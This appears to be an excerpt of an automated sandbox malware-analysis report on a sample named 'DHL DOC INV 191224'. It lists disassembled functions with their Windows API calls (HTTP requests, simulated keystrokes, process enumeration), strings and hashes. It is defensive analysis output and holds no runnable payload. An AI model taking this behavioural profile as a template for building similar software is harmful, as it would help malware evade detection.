                                                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                        • String ID: close all
                                                                                                                        • API String ID: 469580280-3243417748
                                                                                                                        • Opcode ID: e36288d6c72a43d24b78ccda977746be6fea4d7e914be7cbabe4f8e557de1b59
                                                                                                                        • Instruction ID: 4b768f951e3795bd90df95d18ca54036cf39d8376ed3f55238d0e5e88cec0a43
                                                                                                                        • Opcode Fuzzy Hash: e36288d6c72a43d24b78ccda977746be6fea4d7e914be7cbabe4f8e557de1b59
                                                                                                                        • Instruction Fuzzy Hash: D8D15A31701212CFDB2BEF15C899B2AF7A4BF05710F1582ADE84AAB251DB30AD52CF50
                                                                                                                        Function 00335BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00335C7A
                                                                                                                          • Part of subcall function 00335D0A: GetClientRect.USER32(?,?), ref: 00335D30
                                                                                                                          • Part of subcall function 00335D0A: GetWindowRect.USER32(?,?), ref: 00335D71
                                                                                                                          • Part of subcall function 00335D0A: ScreenToClient.USER32(?,?), ref: 00335D99
                                                                                                                        • GetDC.USER32 ref: 003746F5
                                                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00374708
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00374716
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0037472B
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00374733
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003747C4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                        • String ID: U
                                                                                                                        • API String ID: 4009187628-3372436214
                                                                                                                        • Opcode ID: 30ffac31c2a2a0a43e4347f36548b5ab555fd6af1fd3eaa210bc48d7670ccb51
                                                                                                                        • Instruction ID: 50679cf20b9d83c47f550d744b8dce5c36f311a6f197887ffa9e055e8895cbf7
                                                                                                                        • Opcode Fuzzy Hash: 30ffac31c2a2a0a43e4347f36548b5ab555fd6af1fd3eaa210bc48d7670ccb51
                                                                                                                        • Instruction Fuzzy Hash: 0671CF31400245DFCF378F64C984ABA7BB9FF4A314F198269E96A9A166C335A881DF50
                                                                                                                        Function 003A359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 003A35E4
                                                                                                                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                                                                                                                        • LoadStringW.USER32(00402390,?,00000FFF,?), ref: 003A360A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LoadString$_wcslen
                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                        • API String ID: 4099089115-2391861430
                                                                                                                        • Opcode ID: 7b4e712ee4459d3624e83e4b81357478dced0e19715215c4ccbf99878685404e
                                                                                                                        • Instruction ID: 616e476da83c5d6205f365b904c93e44b61844531304d77c23df3905afc7c6f3
                                                                                                                        • Opcode Fuzzy Hash: 7b4e712ee4459d3624e83e4b81357478dced0e19715215c4ccbf99878685404e
                                                                                                                        • Instruction Fuzzy Hash: EF518F72900209BBDF16EBA0CD82EEDBB78EF05310F148125F5057A1A1EB711A99DFA0
                                                                                                                        Function 003C2DFD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 003C2E1C
                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 003C2E4F
                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 003C2E84
                                                                                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 003C2EB6
                                                                                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 003C2EE0
                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 003C2EF1
                                                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003C2F0B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongWindow$MessageSend
                                                                                                                        • String ID: xV
                                                                                                                        • API String ID: 2178440468-2513823414
                                                                                                                        • Opcode ID: b9990ca09d7f702880a94cf1e5fe05ef0580aac1abbe77d3bae3555b0a76f936
                                                                                                                        • Instruction ID: 1a6ec41be08c7b3831b184fbbf6028170ff563e8e7f63c8e68294ff1ab73d986
                                                                                                                        • Opcode Fuzzy Hash: b9990ca09d7f702880a94cf1e5fe05ef0580aac1abbe77d3bae3555b0a76f936
                                                                                                                        • Instruction Fuzzy Hash: 9D310330604254AFDB22DF68DD84FA637E5EB8A710F1A1168F944EF2B1CB71AC50DB41
                                                                                                                        Function 003AC253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003AC272
                                                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003AC29A
                                                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003AC2CA
                                                                                                                        • GetLastError.KERNEL32 ref: 003AC322
                                                                                                                        • SetEvent.KERNEL32(?), ref: 003AC336
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 003AC341
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3113390036-3916222277
                                                                                                                        • Opcode ID: 09c6892ce8ccde329d1cea6e0fcfc2a752b85a8691a7ac748b358bdde0760697
                                                                                                                        • Instruction ID: 0dcb1599485d4e8ed1b3c741b4e68ff391984fc986a6e42a5a77ec6d00f078e0
                                                                                                                        • Opcode Fuzzy Hash: 09c6892ce8ccde329d1cea6e0fcfc2a752b85a8691a7ac748b358bdde0760697
                                                                                                                        • Instruction Fuzzy Hash: 98319FB5520204AFDB239F648C88EAB7BFCEB4A740F14A51EF44AD6640DB34ED059B60
                                                                                                                        Function 0039989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00373AAF,?,?,Bad directive syntax error,003CCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 003998BC
                                                                                                                        • LoadStringW.USER32(00000000,?,00373AAF,?), ref: 003998C3
                                                                                                                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                                                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00399987
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                        • API String ID: 858772685-4153970271
                                                                                                                        • Opcode ID: 5bae579a15b3cd5f1d0844af559bcd77bbc01bf6ca3f2d5e431ce793eee5b58d
                                                                                                                        • Instruction ID: 42a86dfc067c3c54a7d03ea61ce84c158d1659c5e9059f88a98c2b74551bac8a
                                                                                                                        • Opcode Fuzzy Hash: 5bae579a15b3cd5f1d0844af559bcd77bbc01bf6ca3f2d5e431ce793eee5b58d
                                                                                                                        • Instruction Fuzzy Hash: 63212F3194021DABCF17AF90CC46EED7779FF18700F04945AF5156A0A1EB71AA18DB51
                                                                                                                        Function 0039209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32 ref: 003920AB
                                                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 003920C0
                                                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0039214D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClassMessageNameParentSend
                                                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                        • API String ID: 1290815626-3381328864
                                                                                                                        • Opcode ID: b41aa45aea91ccd190ebcc0eb90264b5c53843a904097938a9f7c589b7e9ad66
                                                                                                                        • Instruction ID: 810663421ba8956b222b796727817650dd32de253ea519d525e4fbe4e36f5108
                                                                                                                        • Opcode Fuzzy Hash: b41aa45aea91ccd190ebcc0eb90264b5c53843a904097938a9f7c589b7e9ad66
                                                                                                                        • Instruction Fuzzy Hash: 85112976688B0ABAFE072620DC0BDF7779CDB14329F210016FB04E91E1FE616C655614
                                                                                                                        Function 0036CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1282221369-0
                                                                                                                        • Opcode ID: 7b5664ac40bf08d8950480ebab8685a7e4db928cb668a689bcef489946abea76
                                                                                                                        • Instruction ID: cc7e9303b79155c90e16e578a74a78baeb1aaf79681798ee472b03cda994e824
                                                                                                                        • Opcode Fuzzy Hash: 7b5664ac40bf08d8950480ebab8685a7e4db928cb668a689bcef489946abea76
                                                                                                                        • Instruction Fuzzy Hash: E1614A71A04301AFDB27AFB49C41B7A7BA5EF06350F06C16DF984AF249D7329D0187A0
                                                                                                                        Function 00348B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00386890
                                                                                                                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 003868A9
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 003868B9
                                                                                                                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 003868D1
                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003868F2
                                                                                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00348874,00000000,00000000,00000000,000000FF,00000000), ref: 00386901
                                                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0038691E
                                                                                                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00348874,00000000,00000000,00000000,000000FF,00000000), ref: 0038692D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1268354404-0
                                                                                                                        • Opcode ID: 99eb88ef82c564c2edca5600891d728ecbf5c1cba58701107ec02efccd694e46
                                                                                                                        • Instruction ID: 4753c51287c0d3330b7f10c7b0f505c3bc5d0f6e083dbdabdef7fc008520723c
                                                                                                                        • Opcode Fuzzy Hash: 99eb88ef82c564c2edca5600891d728ecbf5c1cba58701107ec02efccd694e46
                                                                                                                        • Instruction Fuzzy Hash: 22514970600305AFDB22DF25CC56FAA7BB9EB44750F104528F956DA2A0DB70E991DB50
                                                                                                                        Function 003AC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003AC182
                                                                                                                        • GetLastError.KERNEL32 ref: 003AC195
                                                                                                                        • SetEvent.KERNEL32(?), ref: 003AC1A9
                                                                                                                          • Part of subcall function 003AC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003AC272
                                                                                                                          • Part of subcall function 003AC253: GetLastError.KERNEL32 ref: 003AC322
                                                                                                                          • Part of subcall function 003AC253: SetEvent.KERNEL32(?), ref: 003AC336
                                                                                                                          • Part of subcall function 003AC253: InternetCloseHandle.WININET(00000000), ref: 003AC341
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 337547030-0
                                                                                                                        • Opcode ID: 57d17a86eaef8aef3836bfccf98c291e9238b8a1cb137c1d724559e46298f0b1
                                                                                                                        • Instruction ID: b4a7cb2b55c1817c39263daf55ea6d469cfaa13dffd464c74ff99435e24916ba
                                                                                                                        • Opcode Fuzzy Hash: 57d17a86eaef8aef3836bfccf98c291e9238b8a1cb137c1d724559e46298f0b1
                                                                                                                        • Instruction Fuzzy Hash: 93319271220605AFDF229FA5DD44A66BBFCFF1A300F04681DF95AC6A11D731E814DBA0
                                                                                                                        Function 003925A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00393A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00393A57
                                                                                                                          • Part of subcall function 00393A3D: GetCurrentThreadId.KERNEL32 ref: 00393A5E
                                                                                                                          • Part of subcall function 00393A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003925B3), ref: 00393A65
                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 003925BD
                                                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 003925DB
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 003925DF
                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 003925E9
                                                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00392601
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00392605
                                                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0039260F
                                                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00392623
                                                                                                                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00392627
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2014098862-0
                                                                                                                        • Opcode ID: 93044fb3aad5468c8b85b3c1024fa2cf923f9fd0855b41460a67abb36d52222b
                                                                                                                        • Instruction ID: a60c99f244a82fe7823acd25991b7a2366f235888459df3b575f258c94a34b4e
                                                                                                                        • Opcode Fuzzy Hash: 93044fb3aad5468c8b85b3c1024fa2cf923f9fd0855b41460a67abb36d52222b
                                                                                                                        • Instruction Fuzzy Hash: 8B01DF307A0610BBFB2167699C8AF5A7F5DDB4EB12F111001F358EE1E1C9E224448BAA
                                                                                                                        Function 00391803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00391449,?,?,00000000), ref: 0039180C
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00391449,?,?,00000000), ref: 00391813
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00391449,?,?,00000000), ref: 00391828
                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00391449,?,?,00000000), ref: 00391830
                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00391449,?,?,00000000), ref: 00391833
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00391449,?,?,00000000), ref: 00391843
                                                                                                                        • GetCurrentProcess.KERNEL32(00391449,00000000,?,00391449,?,?,00000000), ref: 0039184B
                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,00391449,?,?,00000000), ref: 0039184E
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00391874,00000000,00000000,00000000), ref: 00391868
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1957940570-0
                                                                                                                        • Opcode ID: eaa40f481eb2e7add0321592056a9f682d1f07d4055a789078cc9274d4e8946e
                                                                                                                        • Instruction ID: b1b700a873c485e482fd71dca7e9392ba09844114cf726ae414e8345e66cba38
                                                                                                                        • Opcode Fuzzy Hash: eaa40f481eb2e7add0321592056a9f682d1f07d4055a789078cc9274d4e8946e
                                                                                                                        • Instruction Fuzzy Hash: 3501CDB5250348BFE711AFB6DC4DF6B3BACEB89B11F045411FA09DB1A1CA74A800CB20
                                                                                                                        Function 0039C5D0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 191windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00337620: _wcslen.LIBCMT ref: 00337625
                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0039C6EE
                                                                                                                        • _wcslen.LIBCMT ref: 0039C735
                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0039C79C
                                                                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0039C7CA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                        • String ID: (V$(V$0
                                                                                                                        • API String ID: 1227352736-3922707423
                                                                                                                        • Opcode ID: da924826ebe507f6b92c1eaa86d9878c6ab08b19307ad57dec4c88374abf2af1
                                                                                                                        • Instruction ID: 2c2055b45f246f24631369c05e52af54afa4fc8607dfee1ff71c133893b29fbb
                                                                                                                        • Opcode Fuzzy Hash: da924826ebe507f6b92c1eaa86d9878c6ab08b19307ad57dec4c88374abf2af1
                                                                                                                        • Instruction Fuzzy Hash: 2751EF726243009FDB129F68C885B6BB7E8AF49310F082A2DF995E71E0DB74DD04CB52
                                                                                                                        Function 003BA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0039D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0039D501
                                                                                                                          • Part of subcall function 0039D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0039D50F
                                                                                                                          • Part of subcall function 0039D4DC: CloseHandle.KERNEL32(00000000), ref: 0039D5DC
                                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003BA16D
                                                                                                                        • GetLastError.KERNEL32 ref: 003BA180
